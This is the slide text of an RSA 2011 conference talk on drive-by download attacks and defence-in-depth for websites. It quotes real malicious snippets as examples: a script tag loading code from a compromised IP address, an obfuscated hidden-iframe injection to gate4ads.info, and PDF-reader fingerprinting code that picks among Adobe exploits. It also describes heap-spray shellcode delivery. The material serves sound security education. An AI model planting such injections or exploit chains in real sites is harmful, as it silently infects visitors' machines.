Presentation delivered at the RSA 2011 Conference on how to better protect your website from hacker attacks

1. Drive By Downloads: How To Avoid Getting a Cap Popped in Your App Lars Ewe, Cenzic Neil Daswani, Dasient Session ID: xxx-xxxx Session Classification: xxxxxxxxxxxx

2. Drive-By via XSS on RSA Conf Website Discovered by Gerry Eisenhaur (Dasient) Persistent XSS in Jive “Benign” drive-by injected / Pops up calc.exe Script element embedded in a “tag” at:https://365.rsaconference.com/people/gerrye?view=bookmarks Un-escaped tag (and benign drive-by) rendered athttps://365.rsaconference.com/view-profile-favorites-list.jspa?targetUser=18102 Yet again -- use of SSL alone does not provide security – code must be made secure also!

3. Check This Out … Watch

4. Agenda Quick History of Security Malware Anatomy & Distribution Lifecycle of Malware Protection Future of Web Security

5. 5 Quick History: Security

7. Intrusion Detection Systems (IDS) introduced to monitor anomalous activity

8. Intrusion Prevention Systems (IPS) combined IDS & network firewalls

10. Some vulnerability scanning tools & WAFs deployed, but security holes remain – especially for custom apps

11. Drive-by-downloads mature from prototype attacks to mainstream

12. 2007: SQL Injection used to inject malicious drive-by-download code in addition to data theft

13. 2009: Gumblar web worm infects 80K servers, Web malware used in Aurora attack, widget attacks

15. 8 Malware Anatomy & Distribution

17. XSS

18. PHP file include

20. Network vulnerabilities

21. FTP credentials

22. SSH credentials

24. Step 1: Inject Really Malicious JavaScript

25. Step 1: Inject Really Malicious JavaScript

26. Step 1: Inject Really Malicious JavaScript Sources in malicious JavaScript from a compromised IP! Infects user's machine silently <script id=_0_ src=//218.93.202.61/cp/></script>

27. Step 2: Invoke Client-Side Vulnerability CVE-2008-2992Description: Stack-based buffer overflow in Adobe Acrobat and Reader 8.1.2 and earlier allows remote attackers to execute arbitrary code via a PDF file that calls the util.printf JavaScript function with a crafted format string argument, a related issue to CVE-2008-1104 CVE-2007-5659Description: Multiple buffer overflows in Adobe Reader and Acrobat 8.1.1 and earlier allow remote attackers to execute arbitrary code via a PDF file with long arguments to unspecified JavaScript methods. CVE-2009-0927Description: Stack-based buffer overflow in Adobe Reader and Adobe Acrobat 9 before 9.1, 8 before 8.1.3 , and 7 before 7.1.1 allows remote attackers to execute arbitrary code via a crafted argument to the getIcon method of a Collab object.

28. Step 2: Ex. Fingerprint PDF Reader JavaScript generates a zero-size IFRAME in web page sources in a PDF file PDF file has JavaScript that fingerprints the version of the PDF reader (Note: JavaScript interpreter used by PDF reader is different than JavaScript interpreter used by browser) Attacker needs to determine which version of the PDF reader / JavaScript interpreter to target

29. Step 2: Ex. Fingerprint PDF Reader function pdf_start(){var version=app.viewerVersion.toString();version=version.replace(//g,'');varversion_array=new Array(version.charAt(0),version.charAt(1),version.charAt(2));if((version_array[0]==8)&&(version_array[1]==0)||(version_array[1]==1&&version_array[2]DA3)){util_printf();} if((version_array[0]DA8)||(version_array[0]==8&&version_array[1]DA2&&version_array[2]DA2)){collab_email();} if((version_array[0]DA9)||(version_array[0]==9&&version_array[1]DA1)){collab_geticon();}} pdf_start();}

30. Step 3: Deliver Shellcode Depending upon version of Adobe PDF Reader / JavaScript interpreter, send appropriate shellcode “Spray” the heap with assembly instructions that give shell access Call a PDF reader helper function that jumps to shellcode on the heap (e.g., collab_email())

31. Step 4: Send ‘Downloader’ Example: 2k8.exe

32. Step 5: Join a Botnet: e.g. Zeus

33. Zeus Botnet + Targeted Phishing Botnet propagation + Targeted Phishing: http://internetbanking.gad.de/banking/ http://hsbc.co.uk http://www.mybank.alliance-leicester.co.uk http://www.citibank.de

34. What Next? Steal credentials (e.g., Zeus) Sell fake anti-virus (e.g., Koobface) Steal FTP credentials (e.g., Gumblar) Steal corporate secrets (e.g., Aurora) Collect fraudulent click revenue (e.g., ClickbotA)

35. Evolution: Multi-DOM Node Injection <div id=f37z>*!@g$a+t*e##4a+@d^s!.i!n$f+o@@</div> <script>document.write('<iframe src=apos;'+unescape(document.getElementById('f37z').innerHTML.replace(/[!*^#@$]/g,""))+'apos; width=0 height=0></iframe>');

36. Evolution: Multi-DOM Node Injection <div id=f37z>*!@g$a+t*e##4a+@d^s!.i!n$f+o@@</div> <iframesrc=gate4ads.info width=0 height=0></iframe> <script>document.write('<iframe src=apos;'+unescape(document.getElementById('f37z').innerHTML.replace(/[!*^#@$]/g,""))+'apos; width=0 height=0></iframe>');

37. Infection Library

38. Infection Library: Example Entry

39. 26 Lifecycle of Malware Protection

40. Defense-In-Depth:Lifecycle of Malware Protection Assess Vulnerability & Malware Risk Assessment Security Design Review, Secure Coding Practices, Fix Bugs, WAF, Code Reviews Prevent Detect Web Anti-Malware (WAM) Monitoring Contain mod_antimalware Recover Remove malcode

41. 28 Future of Web Security

43. High volume

44. Low costAdequate Security

45. Manage Website Risk: Fast & Easy TestAllApps For HealthCheck Low R I S K S C O R E Strong Testing for Important Apps Robust Testing for Critical Apps High

46. Takeaways: What You Should Do Within 3 Months Test ALL your web applications via a HealthCheck Test for both application vulnerabilities and malware Prioritize your vulnerabilities based on risk score Block until you remediate Get Feb 2011 Ponemon research report on the state of web application security

48. Cenzic

49. www.cenzic.com / http://blog.cenzic.com

50. Dasient

52. 34 Thank You! Lars Ewe, Cenzic Neil Daswani, Dasient